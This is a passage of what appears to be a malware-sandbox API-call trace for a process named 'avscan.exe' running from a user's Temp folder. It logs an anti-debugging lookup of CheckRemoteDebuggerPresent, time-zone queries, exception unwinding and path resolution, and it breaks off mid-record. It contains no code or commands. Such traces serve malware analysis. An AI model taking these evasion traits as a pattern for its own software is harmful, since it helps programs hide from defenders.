SetLastError (dwErrCode=0x0) [0124.183] GetLastError () returned 0x0 [0124.183] SetLastError (dwErrCode=0x0) [0124.183] GetLastError () returned 0x0 [0124.183] SetLastError (dwErrCode=0x0) [0124.184] GetLastError () returned 0x0 [0124.184] SetLastError (dwErrCode=0x0) [0124.184] GetLastError () returned 0x0 [0124.184] SetLastError (dwErrCode=0x0) [0124.184] GetLastError () returned 0x0 [0124.184] SetLastError (dwErrCode=0x0) [0124.270] GetLastError () returned 0x0 [0124.271] SetLastError (dwErrCode=0x0) [0124.271] GetLastError () returned 0x0 [0124.271] SetLastError (dwErrCode=0x0) [0124.271] GetLastError () returned 0x0 [0124.271] SetLastError (dwErrCode=0x0) [0124.358] GetLastError () returned 0x0 [0124.358] SetLastError (dwErrCode=0x0) [0124.358] GetLastError () returned 0x0 [0124.358] SetLastError (dwErrCode=0x0) [0124.358] GetLastError () returned 0x0 [0124.358] SetLastError (dwErrCode=0x0) [0124.447] GetLastError () returned 0x0 [0124.447] SetLastError (dwErrCode=0x0) [0124.447] GetLastError () returned 0x0 [0124.447] SetLastError (dwErrCode=0x0) [0124.447] GetLastError () returned 0x0 [0124.448] SetLastError (dwErrCode=0x0) [0124.448] GetLastError () returned 0x0 [0124.448] SetLastError (dwErrCode=0x0) [0124.532] GetLastError () returned 0x0 [0124.532] SetLastError (dwErrCode=0x0) [0124.532] GetLastError () returned 0x0 [0124.533] SetLastError (dwErrCode=0x0) [0124.533] GetLastError () returned 0x0 [0124.533] SetLastError (dwErrCode=0x0) [0124.533] GetLastError () returned 0x0 [0124.533] SetLastError (dwErrCode=0x0) [0124.617] GetLastError () returned 0x0 [0124.618] SetLastError (dwErrCode=0x0) [0124.618] GetLastError () returned 0x0 [0124.618] SetLastError (dwErrCode=0x0) [0124.618] GetLastError () returned 0x0 [0124.618] SetLastError (dwErrCode=0x0) [0124.707] GetLastError () returned 0x0 [0124.707] SetLastError (dwErrCode=0x0) [0124.707] GetLastError () returned 0x0 [0124.708] SetLastError (dwErrCode=0x0) [0124.708] GetLastError () returned 0x0 [0124.708] SetLastError (dwErrCode=0x0) [0124.708] GetLastError () returned 0x0 [0124.708] SetLastError (dwErrCode=0x0) [0124.708] GetLastError () returned 0x0 [0124.708] SetLastError (dwErrCode=0x0) [0124.708] GetLastError () returned 0x0 [0124.708] SetLastError (dwErrCode=0x0) [0124.792] GetLastError () returned 0x0 [0124.792] SetLastError (dwErrCode=0x0) [0124.792] GetLastError () returned 0x0 [0124.792] SetLastError (dwErrCode=0x0) [0124.890] GetCurrentThreadId () returned 0xfd8 [0124.890] GetLastError () returned 0x0 [0124.890] SetLastError (dwErrCode=0x0) [0124.890] GetLastError () returned 0x0 [0124.890] SetLastError (dwErrCode=0x0) [0124.971] GetLastError () returned 0x0 [0124.971] SetLastError (dwErrCode=0x0) [0124.971] GetLastError () returned 0x0 [0124.971] SetLastError (dwErrCode=0x0) [0124.971] GetLastError () returned 0x0 [0124.973] SetLastError (dwErrCode=0x0) [0125.069] GetCurrentThreadId () returned 0xfd8 [0125.069] GetLastError () returned 0x0 [0125.069] SetLastError (dwErrCode=0x0) [0125.069] GetLastError () returned 0x0 [0125.069] SetLastError (dwErrCode=0x0) [0125.069] GetLastError () returned 0x0 [0125.069] SetLastError (dwErrCode=0x0) [0125.069] GetCurrentThreadId () returned 0xfd8 [0125.070] GetLastError () returned 0x0 [0125.070] SetLastError (dwErrCode=0x0) [0125.152] GetLastError () returned 0x0 [0125.152] SetLastError (dwErrCode=0x0) [0125.152] GetLastError () returned 0x0 [0125.153] SetLastError (dwErrCode=0x0) [0125.153] GetLastError () returned 0x0 [0125.153] SetLastError (dwErrCode=0x0) [0125.228] GetLastError () returned 0x0 [0125.228] SetLastError (dwErrCode=0x0) [0125.228] GetLastError () returned 0x0 [0125.229] SetLastError (dwErrCode=0x0) [0125.229] GetCurrentThreadId () returned 0xfd8 [0125.229] GetLastError () returned 0x0 [0125.229] SetLastError (dwErrCode=0x0) [0125.229] GetLastError () returned 0x0 [0125.229] SetLastError (dwErrCode=0x0) [0125.229] GetLastError () returned 0x0 [0125.230] SetLastError (dwErrCode=0x0) [0125.302] GetCurrentThreadId () returned 0xfd8 [0125.302] GetLastError () returned 0x0 [0125.302] SetLastError (dwErrCode=0x0) [0125.302] GetLastError () returned 0x0 [0125.303] SetLastError (dwErrCode=0x0) [0125.303] GetLastError () returned 0x0 [0125.303] SetLastError (dwErrCode=0x0) [0125.303] GetCurrentThreadId () returned 0xfd8 [0125.303] GetLastError () returned 0x0 [0125.303] SetLastError (dwErrCode=0x0) [0125.376] GetLastError () returned 0x0 [0125.376] SetLastError (dwErrCode=0x0) [0125.376] GetLastError () returned 0x0 [0125.377] SetLastError (dwErrCode=0x0) [0125.377] GetCurrentThreadId () returned 0xfd8 [0125.377] GetLastError () returned 0x0 [0125.377] SetLastError (dwErrCode=0x0) [0125.453] GetLastError () returned 0x0 [0125.453] SetLastError (dwErrCode=0x0) [0125.453] GetLastError () returned 0x0 [0125.453] SetLastError (dwErrCode=0x0) [0125.453] GetCurrentThreadId () returned 0xfd8 [0125.454] GetLastError () returned 0x0 [0125.454] SetLastError (dwErrCode=0x0) [0125.454] GetLastError () returned 0x0 [0125.454] SetLastError (dwErrCode=0x0) [0125.454] GetLastError () returned 0x0 [0125.454] SetLastError (dwErrCode=0x0) [0125.520] GetCurrentThreadId () returned 0xfd8 [0125.521] GetLastError () returned 0x0 [0125.521] SetLastError (dwErrCode=0x0) [0125.521] GetLastError () returned 0x0 [0125.521] SetLastError (dwErrCode=0x0) [0125.521] GetLastError () returned 0x0 [0125.521] SetLastError (dwErrCode=0x0) [0125.521] GetLastError () returned 0x0 [0125.522] SetLastError (dwErrCode=0x0) [0125.587] GetLastError () returned 0x0 [0125.588] SetLastError (dwErrCode=0x0) [0125.588] GetLastError () returned 0x0 [0125.588] SetLastError (dwErrCode=0x0) [0125.588] GetLastError () returned 0x0 [0125.588] SetLastError (dwErrCode=0x0) [0125.654] GetLastError () returned 0x0 [0125.654] SetLastError (dwErrCode=0x0) [0125.654] GetLastError () returned 0x0 [0125.654] SetLastError (dwErrCode=0x0) [0125.654] GetLastError () returned 0x0 [0125.654] SetLastError (dwErrCode=0x0) [0125.655] GetLastError () returned 0x0 [0125.655] SetLastError (dwErrCode=0x0) [0125.655] GetLastError () returned 0x0 [0125.655] SetLastError (dwErrCode=0x0) [0125.741] GetLastError () returned 0x0 [0125.741] SetLastError (dwErrCode=0x0) [0125.741] GetLastError () returned 0x0 [0125.741] SetLastError (dwErrCode=0x0) [0125.741] GetLastError () returned 0x0 [0125.742] SetLastError (dwErrCode=0x0) [0125.811] GetLastError () returned 0x0 [0125.811] SetLastError (dwErrCode=0x0) [0125.811] GetLastError () returned 0x0 [0125.811] SetLastError (dwErrCode=0x0) [0125.811] GetLastError () returned 0x0 [0125.812] SetLastError (dwErrCode=0x0) [0125.812] GetLastError () returned 0x0 [0125.812] SetLastError (dwErrCode=0x0) [0125.879] GetLastError () returned 0x0 [0125.879] SetLastError (dwErrCode=0x0) [0125.879] GetLastError () returned 0x0 [0125.879] SetLastError (dwErrCode=0x0) [0125.879] GetLastError () returned 0x0 [0125.880] SetLastError (dwErrCode=0x0) [0125.952] GetLastError () returned 0x0 [0125.952] SetLastError (dwErrCode=0x0) [0125.952] GetLastError () returned 0x0 [0125.952] SetLastError (dwErrCode=0x0) [0125.952] GetLastError () returned 0x0 [0125.953] SetLastError (dwErrCode=0x0) [0125.953] GetLastError () returned 0x0 [0125.953] SetLastError (dwErrCode=0x0) [0125.953] GetLastError () returned 0x0 [0125.953] SetLastError (dwErrCode=0x0) [0126.021] GetLastError () returned 0x0 [0126.021] SetLastError (dwErrCode=0x0) [0126.021] GetLastError () returned 0x0 [0126.022] SetLastError (dwErrCode=0x0) [0126.022] GetLastError () returned 0x0 [0126.022] SetLastError (dwErrCode=0x0) [0126.101] GetLastError () returned 0x0 [0126.101] SetLastError (dwErrCode=0x0) [0126.102] GetLastError () returned 0x0 [0126.102] SetLastError (dwErrCode=0x0) [0126.102] GetLastError () returned 0x0 [0126.102] SetLastError (dwErrCode=0x0) [0126.102] GetLastError () returned 0x0 [0126.102] SetLastError (dwErrCode=0x0) [0126.168] GetLastError () returned 0x0 [0126.168] SetLastError (dwErrCode=0x0) [0126.168] GetLastError () returned 0x0 [0126.168] SetLastError (dwErrCode=0x0) [0126.168] GetLastError () returned 0x0 [0126.169] SetLastError (dwErrCode=0x0) [0126.169] GetLastError () returned 0x0 [0126.169] SetLastError (dwErrCode=0x0) [0126.241] GetLastError () returned 0x0 [0126.241] SetLastError (dwErrCode=0x0) [0126.241] GetLastError () returned 0x0 [0126.241] SetLastError (dwErrCode=0x0) [0126.241] GetLastError () returned 0x0 [0126.242] SetLastError (dwErrCode=0x0) [0126.242] GetLastError () returned 0x0 [0126.242] SetLastError (dwErrCode=0x0) [0126.306] GetLastError () returned 0x0 [0126.306] SetLastError (dwErrCode=0x0) [0126.306] GetLastError () returned 0x0 [0126.306] SetLastError (dwErrCode=0x0) [0126.356] GetLastError () returned 0x0 [0126.356] SetLastError (dwErrCode=0x0) [0126.356] GetLastError () returned 0x0 [0126.356] SetLastError (dwErrCode=0x0) [0126.416] GetLastError () returned 0x0 [0126.416] SetLastError (dwErrCode=0x0) [0126.416] GetLastError () returned 0x0 [0126.416] SetLastError (dwErrCode=0x0) [0126.467] GetLastError () returned 0x0 [0126.467] SetLastError (dwErrCode=0x0) [0126.467] GetLastError () returned 0x0 [0126.467] SetLastError (dwErrCode=0x0) [0126.467] GetLastError () returned 0x0 [0126.468] SetLastError (dwErrCode=0x0) [0126.516] GetLastError () returned 0x0 [0126.516] SetLastError (dwErrCode=0x0) [0126.517] GetLastError () returned 0x0 [0126.517] SetLastError (dwErrCode=0x0) [0126.517] VirtualFree (lpAddress=0x3364000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0126.519] GetLastError () returned 0x0 [0126.519] SetLastError (dwErrCode=0x0) [0126.519] GetLastError () returned 0x0 [0126.519] SetLastError (dwErrCode=0x0) [0126.568] GetLastError () returned 0x0 [0126.568] SetLastError (dwErrCode=0x0) [0126.568] GetLastError () returned 0x0 [0126.569] SetLastError (dwErrCode=0x0) [0126.617] GetLastError () returned 0x0 [0126.617] SetLastError (dwErrCode=0x0) [0126.617] GetLastError () returned 0x0 [0126.617] SetLastError (dwErrCode=0x0) [0126.617] GetLastError () returned 0x0 [0126.617] SetLastError (dwErrCode=0x0) [0126.618] GetLastError () returned 0x0 [0126.618] SetLastError (dwErrCode=0x0) [0126.668] GetLastError () returned 0x0 [0126.669] SetLastError (dwErrCode=0x0) [0126.669] GetLastError () returned 0x0 [0126.669] SetLastError (dwErrCode=0x0) [0126.669] GetLastError () returned 0x0 [0126.669] SetLastError (dwErrCode=0x0) [0126.717] GetLastError () returned 0x0 [0126.718] SetLastError (dwErrCode=0x0) [0126.718] GetLastError () returned 0x0 [0126.718] SetLastError (dwErrCode=0x0) [0126.718] GetLastError () returned 0x0 [0126.718] SetLastError (dwErrCode=0x0) [0126.767] GetLastError () returned 0x0 [0126.767] SetLastError (dwErrCode=0x0) [0126.767] GetLastError () returned 0x0 [0126.767] SetLastError (dwErrCode=0x0) [0126.767] GetLastError () returned 0x0 [0126.767] SetLastError (dwErrCode=0x0) [0126.767] GetLastError () returned 0x0 [0126.768] SetLastError (dwErrCode=0x0) [0126.817] GetLastError () returned 0x0 [0126.817] SetLastError (dwErrCode=0x0) [0126.817] GetLastError () returned 0x0 [0126.818] SetLastError (dwErrCode=0x0) [0126.818] GetLastError () returned 0x0 [0126.818] SetLastError (dwErrCode=0x0) [0126.818] GetLastError () returned 0x0 [0126.818] SetLastError (dwErrCode=0x0) [0126.818] GetLastError () returned 0x0 [0126.818] SetLastError (dwErrCode=0x0) [0126.867] GetLastError () returned 0x0 [0126.867] SetLastError (dwErrCode=0x0) [0126.867] GetLastError () returned 0x0 [0126.868] SetLastError (dwErrCode=0x0) [0126.868] GetLastError () returned 0x0 [0126.868] SetLastError (dwErrCode=0x0) [0126.868] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0126.868] GetLastError () returned 0x0 [0126.868] SetLastError (dwErrCode=0x0) [0126.939] GetLastError () returned 0x0 [0126.939] SetLastError (dwErrCode=0x0) [0126.939] GetLastError () returned 0x0 [0126.939] SetLastError (dwErrCode=0x0) [0126.988] GetProcAddress (hModule=0x75a80000, lpProcName="CheckRemoteDebuggerPresent") returned 0x75abb0de [0126.988] GetLastError () returned 0x0 [0126.988] SetLastError (dwErrCode=0x0) [0126.988] GetLastError () returned 0x0 [0126.988] SetLastError (dwErrCode=0x0) [0126.988] GetLastError () returned 0x0 [0126.988] SetLastError (dwErrCode=0x0) [0127.037] GetLocalTime (in: lpSystemTime=0x28fe6c | out: lpSystemTime=0x28fe6c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x23, wMilliseconds=0x240)) [0127.038] GetLastError () returned 0x0 [0127.038] SetLastError (dwErrCode=0x0) [0127.088] GetLastError () returned 0x0 [0127.088] SetLastError (dwErrCode=0x0) [0127.088] GetCurrentThreadId () returned 0xfd8 [0127.088] GetLastError () returned 0x0 [0127.088] SetLastError (dwErrCode=0x0) [0127.088] GetLastError () returned 0x0 [0127.088] SetLastError (dwErrCode=0x0) [0127.088] GetLastError () returned 0x0 [0127.089] SetLastError (dwErrCode=0x0) [0127.089] GetLastError () returned 0x0 [0127.089] SetLastError (dwErrCode=0x0) [0127.089] GetLastError () returned 0x0 [0127.089] SetLastError (dwErrCode=0x0) [0127.089] GetCurrentThreadId () returned 0xfd8 [0127.089] GetLastError () returned 0x0 [0127.089] SetLastError (dwErrCode=0x0) [0127.138] GetLastError () returned 0x0 [0127.139] SetLastError (dwErrCode=0x0) [0127.139] GetLastError () returned 0x0 [0127.139] SetLastError (dwErrCode=0x0) [0127.139] GetLastError () returned 0x0 [0127.139] SetLastError (dwErrCode=0x0) [0127.139] GetTimeZoneInformation (in: lpTimeZoneInformation=0x28fdbc | out: lpTimeZoneInformation=0x28fdbc) returned 0x2 [0127.149] GetLastError () returned 0x0 [0127.149] SetLastError (dwErrCode=0x0) [0127.206] GetLastError () returned 0x0 [0127.206] SetLastError (dwErrCode=0x0) [0127.206] GetCurrentThreadId () returned 0xfd8 [0127.206] GetLastError () returned 0x0 [0127.207] SetLastError (dwErrCode=0x0) [0127.207] GetLastError () returned 0x0 [0127.207] SetLastError (dwErrCode=0x0) [0127.257] GetLastError () returned 0x0 [0127.257] SetLastError (dwErrCode=0x0) [0127.257] GetCurrentThreadId () returned 0xfd8 [0127.257] GetLastError () returned 0x0 [0127.257] SetLastError (dwErrCode=0x0) [0127.257] GetLastError () returned 0x0 [0127.257] SetLastError (dwErrCode=0x0) [0127.257] GetLastError () returned 0x0 [0127.258] SetLastError (dwErrCode=0x0) [0127.258] GetLastError () returned 0x0 [0127.258] SetLastError (dwErrCode=0x0) [0127.306] GetLocalTime (in: lpSystemTime=0x28fe6c | out: lpSystemTime=0x28fe6c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x23, wMilliseconds=0x2ad)) [0127.306] GetLastError () returned 0x0 [0127.306] SetLastError (dwErrCode=0x0) [0127.306] GetLastError () returned 0x0 [0127.307] SetLastError (dwErrCode=0x0) [0127.307] GetCurrentThreadId () returned 0xfd8 [0127.307] GetLastError () returned 0x0 [0127.307] SetLastError (dwErrCode=0x0) [0127.307] GetLastError () returned 0x0 [0127.307] SetLastError (dwErrCode=0x0) [0127.357] GetLastError () returned 0x0 [0127.357] SetLastError (dwErrCode=0x0) [0127.357] GetLastError () returned 0x0 [0127.357] SetLastError (dwErrCode=0x0) [0127.357] GetCurrentThreadId () returned 0xfd8 [0127.358] GetLastError () returned 0x0 [0127.358] SetLastError (dwErrCode=0x0) [0127.358] GetLastError () returned 0x0 [0127.358] SetLastError (dwErrCode=0x0) [0127.358] GetLastError () returned 0x0 [0127.358] SetLastError (dwErrCode=0x0) [0127.358] GetLastError () returned 0x0 [0127.358] SetLastError (dwErrCode=0x0) [0127.406] GetTimeZoneInformation (in: lpTimeZoneInformation=0x28fdbc | out: lpTimeZoneInformation=0x28fdbc) returned 0x2 [0127.406] GetLastError () returned 0x0 [0127.407] SetLastError (dwErrCode=0x0) [0127.407] GetLastError () returned 0x0 [0127.407] SetLastError (dwErrCode=0x0) [0127.407] GetCurrentThreadId () returned 0xfd8 [0127.407] GetLastError () returned 0x0 [0127.407] SetLastError (dwErrCode=0x0) [0127.455] GetLastError () returned 0x0 [0127.455] SetLastError (dwErrCode=0x0) [0127.456] GetLastError () returned 0x0 [0127.456] SetLastError (dwErrCode=0x0) [0127.456] GetCurrentThreadId () returned 0xfd8 [0127.456] GetLastError () returned 0x0 [0127.456] SetLastError (dwErrCode=0x0) [0127.510] GetLastError () returned 0x0 [0127.511] SetLastError (dwErrCode=0x0) [0127.511] GetLastError () returned 0x0 [0127.511] SetLastError (dwErrCode=0x0) [0127.511] GetLastError () returned 0x0 [0127.511] SetLastError (dwErrCode=0x0) [0127.563] GetLastError () returned 0x0 [0127.564] SetLastError (dwErrCode=0x0) [0127.612] GetLastError () returned 0x0 [0127.612] SetLastError (dwErrCode=0x0) [0127.612] GetLastError () returned 0x0 [0127.613] SetLastError (dwErrCode=0x0) [0127.613] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0127.613] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0127.614] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0127.614] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0127.615] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0127.615] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0127.616] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0127.616] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0127.616] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0127.617] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0127.617] GetLastError () returned 0x0 [0127.617] SetLastError (dwErrCode=0x0) [0127.617] GetLastError () returned 0x0 [0127.618] SetLastError (dwErrCode=0x0) [0127.618] GetLastError () returned 0x0 [0127.618] SetLastError (dwErrCode=0x0) [0127.666] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x114bcc4, nSize=0x104 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0127.667] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\Ap", cchLength=0x14 | out: lpsz="c:\\users\\keecfm~1\\ap") returned 0x14 [0127.667] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", nBufferLength=0x104, lpBuffer=0x28f9cc, lpFilePart=0x28f9c8 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpFilePart=0x28f9c8*="avscan.exe") returned 0x2f [0127.667] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe"), lpFindFileData=0x28fc28 | out: lpFindFileData=0x28fc28*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xf38c1580, ftCreationTime.dwHighDateTime=0x1da9884, ftLastAccessTime.dwLowDateTime=0xf38c1580, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf67c4800, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x1442557, dwReserved0=0x557580, dwReserved1=0x0, cFileName="avscan.exe", cAlternateFileName="")) returned 0x114b2b8 [0127.667] FileTimeToLocalFileTime (in: lpFileTime=0x28fc3c, lpLocalFileTime=0x28fbc0 | out: lpLocalFileTime=0x28fbc0) returned 1 [0127.668] FileTimeToDosDateTime (in: lpFileTime=0x28fbc0, lpFatDate=0x28fc0a, lpFatTime=0x28fc08 | out: lpFatDate=0x28fc0a, lpFatTime=0x28fc08) returned 1 [0127.668] SysReAllocStringLen (in: pbstr=0x28fc00*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28fc00*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0127.668] SysReAllocStringLen (in: pbstr=0x28fbf8*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", len=0x2f | out: pbstr=0x28fbf8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned 1 [0127.668] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", cchLength=0x2f | out: lpsz="c:\\users\\keecfm~1\\appdata\\local\\temp\\avscan.exe") returned 0x2f [0127.668] SysReAllocStringLen (in: pbstr=0x28ff10*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", psz="c:\\users\\keecfm~1\\appdata\\local\\temp\\avscan.exe", len=0x2f | out: pbstr=0x28ff10*="c:\\users\\keecfm~1\\appdata\\local\\temp\\avscan.exe") returned 1 [0127.668] GetLastError () returned 0x0 [0127.669] SetLastError (dwErrCode=0x0) [0127.669] GetLastError () returned 0x0 [0127.669] SetLastError (dwErrCode=0x0) [0127.669] GetLastError () returned 0x0 [0127.669] SetLastError (dwErrCode=0x0) [0127.669] SysReAllocStringLen (in: pbstr=0x557578*=0x0, psz="c:\\users\\keecfm~1\\appdata\\local\\temp\\avscan.exe", len=0x2f | out: pbstr=0x557578*="c:\\users\\keecfm~1\\appdata\\local\\temp\\avscan.exe") returned 1 [0127.669] GetLastError () returned 0x0 [0127.670] SetLastError (dwErrCode=0x0) [0127.721] GetLastError () returned 0x0 [0127.721] SetLastError (dwErrCode=0x0) [0127.721] GetLastError () returned 0x0 [0127.721] SetLastError (dwErrCode=0x0) [0127.722] SysReAllocStringLen (in: pbstr=0x337004c*=0x0, psz="c:\\users\\keecfm~1\\appdata\\local\\temp\\avscan.exe", len=0x2f | out: pbstr=0x337004c*="c:\\users\\keecfm~1\\appdata\\local\\temp\\avscan.exe") returned 1 [0127.722] SysReAllocStringLen (in: pbstr=0x3370060*=0x0, psz="c:\\users\\keecfm~1\\appdata\\local\\temp\\", len=0x25 | out: pbstr=0x3370060*="c:\\users\\keecfm~1\\appdata\\local\\temp\\") returned 1 [0127.722] SysReAllocStringLen (in: pbstr=0x28fe60*=0x0, psz="c:\\users\\keecfm~1\\appdata\\local\\temp\\", len=0x25 | out: pbstr=0x28fe60*="c:\\users\\keecfm~1\\appdata\\local\\temp\\") returned 1 [0127.770] CharLowerBuffW (in: lpsz="c:\\users\\keecfm~1\\appdata\\local\\temp\\", cchLength=0x25 | out: lpsz="c:\\users\\keecfm~1\\appdata\\local\\temp\\") returned 0x25 [0127.770] SysReAllocStringLen (in: pbstr=0x337009c*=0x0, psz="c:\\users\\keecfm~1\\appdata\\local\\temp\\", len=0x25 | out: pbstr=0x337009c*="c:\\users\\keecfm~1\\appdata\\local\\temp\\") returned 1 [0127.770] SysReAllocStringLen (in: pbstr=0x33700a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33700a0*="c:") returned 1 [0127.771] SysReAllocStringLen (in: pbstr=0x3330834*=0x0, psz="users", len=0x5 | out: pbstr=0x3330834*="users") returned 1 [0127.771] SysReAllocStringLen (in: pbstr=0x33700d4*=0x0, psz="keecfm~1", len=0x8 | out: pbstr=0x33700d4*="keecfm~1") returned 1 [0127.771] SysReAllocStringLen (in: pbstr=0x33700e0*=0x0, psz="appdata", len=0x7 | out: pbstr=0x33700e0*="appdata") returned 1 [0127.772] SysReAllocStringLen (in: pbstr=0x33700ec*=0x0, psz="local", len=0x5 | out: pbstr=0x33700ec*="local") returned 1 [0127.772] SysReAllocStringLen (in: pbstr=0x33700f8*=0x0, psz="temp", len=0x4 | out: pbstr=0x33700f8*="temp") returned 1 [0127.772] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0127.773] SysReAllocStringLen (in: pbstr=0x28fe64*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe64*="c:\\") returned 1 [0127.773] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0127.773] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x114c6f8 [0127.773] FindNextFileW (in: hFindFile=0x114c6f8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0127.773] GetLastError () returned 0x12 [0127.773] FindClose (in: hFindFile=0x114c6f8 | out: hFindFile=0x114c6f8) returned 1 [0127.774] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0127.774] SysReAllocStringLen (in: pbstr=0x28fe64*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fe64*="c:\\Users\\") returned 1 [0127.774] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfm~1", len=0x8 | out: pbstr=0x28fae8*="keecfm~1") returned 1 [0127.774] FindFirstFileW (in: lpFileName="c:\\Users\\keecfm~1" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x114c6f8 [0127.774] FindNextFileW (in: hFindFile=0x114c6f8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0127.775] GetLastError () returned 0x12 [0127.775] FindClose (in: hFindFile=0x114c6f8 | out: hFindFile=0x114c6f8) returned 1 [0127.775] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0127.775] SysReAllocStringLen (in: pbstr=0x28fe64*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fe64*="c:\\Users\\kEecfMwgj\\") returned 1 [0127.775] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfm~1", psz="appdata", len=0x7 | out: pbstr=0x28fae8*="appdata") returned 1 [0127.775] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\appdata" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, 